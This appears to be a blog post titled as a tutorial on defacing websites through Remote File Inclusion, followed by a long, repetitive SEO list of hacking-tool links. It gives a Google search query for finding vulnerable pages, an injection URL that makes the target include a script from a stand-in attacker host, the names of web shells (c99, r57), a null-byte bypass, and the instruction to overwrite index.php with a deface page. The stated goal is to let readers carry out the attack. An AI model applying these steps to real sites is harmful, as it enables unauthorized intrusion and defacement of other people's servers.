HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related posts
- Hacking Tools Github
- Hacker Tools Mac
- Hacking Tools Hardware
- Pentest Tools For Windows
- Nsa Hack Tools
- Hacking Tools For Mac
- Pentest Tools For Ubuntu
- Hacker Tools For Ios
- Hacking Tools Hardware
- Hacking Tools For Windows
- Pentest Tools
- Hack Tools Github
- Pentest Tools
- Hacking Tools And Software
- Hacking Tools Name
- Pentest Tools Download
- Hacker Tools Apk Download
- Hacker Tools Apk Download
- Pentest Tools Review
- Hack Tools For Ubuntu
- Termux Hacking Tools 2019
- Hacks And Tools
- Hacker Tools Free Download
- Pentest Tools For Windows
- Pentest Box Tools Download
- Hacking App
- Hacking Tools Github
- Kik Hack Tools
- Nsa Hack Tools Download
- Hacking Tools 2020
- Hack Tools For Windows
- Computer Hacker
- Hacking Tools
- Pentest Tools Subdomain
- How To Hack
- Hacking Tools Free Download
- Hacking Tools For Games
- Hack Tools 2019
- Hacking Tools 2020
- Hacker Tools Online
- Pentest Tools Download
- Hacker Tools For Windows
- Tools For Hacker
- Hacking Apps
- Pentest Box Tools Download
- New Hacker Tools
- Termux Hacking Tools 2019
- Android Hack Tools Github
- Hack Website Online Tool
- Hacker Techniques Tools And Incident Handling
- Hack Tools Github
- Pentest Tools Github
- Pentest Tools Open Source
- Hacking App
- Github Hacking Tools
- Nsa Hacker Tools
- Pentest Tools Kali Linux
- Pentest Tools For Ubuntu
- Blackhat Hacker Tools
- Hack Tools For Mac
- Hack Tools For Games
- Hacking Tools Windows 10
- Hak5 Tools
- Hacking Tools Online
- Hacker Tools For Mac
- Hacking Tools For Games
- Hacking Tools 2019
- Hack Tools Pc
- Pentest Tools Tcp Port Scanner
- Pentest Tools Website
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Website
- Hacker Tools Mac
- Tools For Hacker
- Hack Tools Mac
- Hacking Tools 2019
- Growth Hacker Tools
- Pentest Recon Tools
- Pentest Tools Github
- How To Hack
- Pentest Tools For Ubuntu
- Hacking Tools Hardware
- Nsa Hack Tools
- Github Hacking Tools
- Hacking Tools Download
- World No 1 Hacker Software
- Hack Tools Mac
- Hack Tools For Pc
- Hacking Tools For Windows Free Download
- Hacker Tools Mac
- Pentest Tools Url Fuzzer
- Hacking Tools Mac
- Termux Hacking Tools 2019
- Hack Tools For Games
- Hacking Tools For Windows Free Download
- Pentest Tools Apk
- Hack App
- Pentest Tools Open Source
- Pentest Tools Windows
- Nsa Hacker Tools
- Hacking Tools
- Pentest Tools Framework
- Pentest Tools Url Fuzzer
- Pentest Tools For Mac
- Hack App
- Pentest Tools Url Fuzzer
- Pentest Tools Framework
- Physical Pentest Tools
- Hackrf Tools
- Hacking Tools Name
- Hack Tools
- Pentest Tools For Ubuntu
- Tools Used For Hacking
- Hacker
- Hacker Tools Linux
- How To Hack
- Pentest Tools Open Source
- Hacker Security Tools
- Hacking Tools For Pc
- Usb Pentest Tools
- Underground Hacker Sites
- Tools Used For Hacking
- What Is Hacking Tools
- Hack Tools For Ubuntu
- Hack Tools For Mac
- Hacking Tools Free Download
- Hacking Tools Free Download
- Hacking Tools Windows 10
- Hack Tools Download
- Game Hacking
- Best Hacking Tools 2019
- Hacking Tools Online
- Hacker Tools Mac
- Black Hat Hacker Tools
- Hacking Tools Online
- Hack Tools
- Tools 4 Hack
- Hacker Tools 2020
- Hacker Security Tools
- Beginner Hacker Tools
- Hacking Tools Hardware
- Hack Tools For Games
- Hacker Tools Free
- Kik Hack Tools
- Pentest Recon Tools
- Pentest Tools Subdomain
- Tools For Hacker
- Ethical Hacker Tools
No comments:
Post a Comment